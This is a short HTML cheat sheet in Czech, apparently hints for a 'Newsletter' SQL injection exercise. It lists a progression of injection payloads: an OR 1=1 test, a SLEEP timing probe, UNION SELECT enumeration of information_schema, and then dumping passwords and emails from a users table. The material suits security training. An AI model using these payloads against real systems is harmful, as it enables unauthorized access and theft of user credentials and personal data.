<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cheat sheet a nápověda k Newsletteru</title>
    <style>
        li {
            margin-bottom: 8px;
        }
    </style>
</head>
<body>
    <ul>
        <li><code>SELECT ? FROM ? WHERE ? = 'username';</code><br>
            Návrh query
        </li>
        <li>
            <code>SELECT ? FROM ? WHERE ? = '' OR 1=1 -- -';</code><br>
            První test
        </li>
        <li>
            <code>SELECT ? FROM ? WHERE ? = '' OR 0 = SLEEP(1) -- -';</code><br>
            Testování, co to je za db službu
        </li>
        <li>
            <code>SELECT ? FROM ? WHERE ? = '' UNION SELECT 1 FROM dual -- - ';</code><br>
            Pokus o vytisknutí vlastního příkazu... 
        </li>
        <li>
            <code>SELECT ? FROM ? WHERE ? = '' UNION SELECT TABLE_SCHEMA FROM information_schema.tables -- - ';</code><br>
            <code>SELECT ? FROM ? WHERE ? = '' UNION SELECT TABLE_NAME FROM information_schema.tables -- - ';</code><br>
            Tisk údajů o databázi...
        </li>
        <li>
            <code>SELECT ? FROM ? WHERE ? = '' UNION SELECT COLUMN_NAME FROM information_schema.columns WHERE TABLE_NAME = 'users' -- - ';</code><br>
            Zaměření a průzkum users databáze
        </li>
        <li>
            <code>SELECT ? FROM ? WHERE ? = '' UNION SELECT password FROM users -- - ';</code><br>
            Tisk hesel
        </li>
        <li>
            <code>SELECT ? FROM ? WHERE ? = '' UNION SELECT email FROM users -- - ';</code><br>
            Tisk mailů
        </li>
    </ul>
</body>
</html>